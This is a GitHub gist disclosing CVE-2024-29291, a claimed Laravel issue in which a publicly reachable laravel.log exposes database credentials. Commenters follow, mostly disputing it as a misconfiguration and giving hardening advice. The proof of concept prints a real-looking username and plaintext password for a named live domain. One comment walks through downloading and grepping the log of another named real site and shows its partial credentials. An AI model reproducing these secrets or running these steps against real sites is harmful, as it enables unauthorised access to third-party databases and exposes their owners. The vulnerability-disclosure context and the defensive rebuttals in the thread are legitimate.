Skip to content

Instantly share code, notes, and snippets.

@whiteman007
Last active June 4, 2024 14:15
Show Gist options
  • Save whiteman007/43bd7fa1fa0e47554b33f0cf93066784 to your computer and use it in GitHub Desktop.
Save whiteman007/43bd7fa1fa0e47554b33f0cf93066784 to your computer and use it in GitHub Desktop.
CVE-ID: CVE-2024-29291
Description:
A vulnerability has been discovered in the Laravel Framework in versions from 8.* to 11.*, allowing a remote attacker to obtain sensitive information via the laravel.log component. This vulnerability leads to the leakage of database credentials.
Additional Information:
None.
Risk:
High.
Vulnerability Type:
Database credential leak vulnerability.
Vendor of Product:
Laravel Framework.
Affected Product Code Base:
Laravel FRAMEWORK - 8.* - 11.*
Affected Component:
laravel.log.
Attack Type:
Remote.
Impact Information Disclosure:
True.
Attack Vectors:
Database credential leak vulnerability.
Description:
Access to private Database credential data is possible by logging into the website database. Additionally, login data for database access can be retrieved.
Proof of concept:
Go to any Laravel-based website and navigate to storage/logs/laravel.log.
Open the file and search for "PDO->__construct('mysql:host=".
The result:
shell
Copy code
#0 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70): PDO->__construct('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array)
#1 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(46): Illuminate\Database\Connectors\Connector->createPdoConnection('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array)
Credentials:
Username: u429384055_jscv
Password: Jaly$$a0p0p0p0
Host: sql1...
Now you can login to the database.
By: Huseein Amer
Facebook: https://www.facebook.com/hussein.amer.75491/
@jannescb
Copy link

This only works in misconfigured apps, right?
/storage should be symlinked to /storage/app/public when using php artisan storage:link

@whiteman007
Copy link
Author

This only works in misconfigured apps, right? /storage should be symlinked to /storage/app/public when using php artisan storage:link

The problem lies in the laravel.log file, where the system stores the login data in the log file

@Jelle-SamsonIT
Copy link

Jelle-SamsonIT commented Apr 22, 2024

if you can navigate to storage/logs/laravel.log you can just as well do cat .env
Also, turn off debug mode please.

To anyone reading this: This does not deserve a CVE. Don't waste your time.

This is a misconception based on a deployment error.
The app should have been in prod logging mode with a loglevel higher than debug AND the /public folder should have been the root of the web path so that storage/logs was never accessible in the first place.
If storage/logs is accessible, so is .env, config/ and vendor/

@whiteman007
Copy link
Author

if you can navigate to storage/logs/laravel.log you can just as well do cat .env Also, turn off debug mode please.

To anyone reading this: This does not deserve a CVE. Don't waste your time.

This is a misconception based on a deployment error. The app should have been in prod logging mode with a loglevel higher than debug AND the /public folder should have been the root of the web path so that storage/logs was never accessible in the first place. If storage/logs is accessible, so is .env, config/ and vendor/

mr Jelle-SamsonIT
Connection data can be displayed even if the .env file cannot be read by an attacker. It is enough just to have the ability to read the log file.
As on the site
https://www.digo.sa/.env
It shows you that 403
Forbidden
Cannot display data from env file
Go
https://www.digo.sa/storage/logs/laravel.log
Write it down
wget https://www.digo.sa/storage/logs/laravel.log
and
grep host laravel.log
and you can now show
'mysql:host=127....', 'africansc_afric...', 'TYumh2rsJ0WP7Qe...'
As for the eligibility to grant CVE, mitre.org has classified it as high risk

@Hypernik
Copy link

Hypernik commented May 7, 2024

Read this documentation https://laravel.com/docs/11.x/filesystem#the-public-disk
it says "The public disk included in your application's filesystems configuration file is intended for files that are going to be publicly accessible. By default, the public disk uses the local driver and stores its files in storage/app/public"
Thus storage/logs should not be accessible.

@geovaniralmeida
Copy link

The Connector class could make use of the SensitiveParameter attribute. Seems appropriate

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment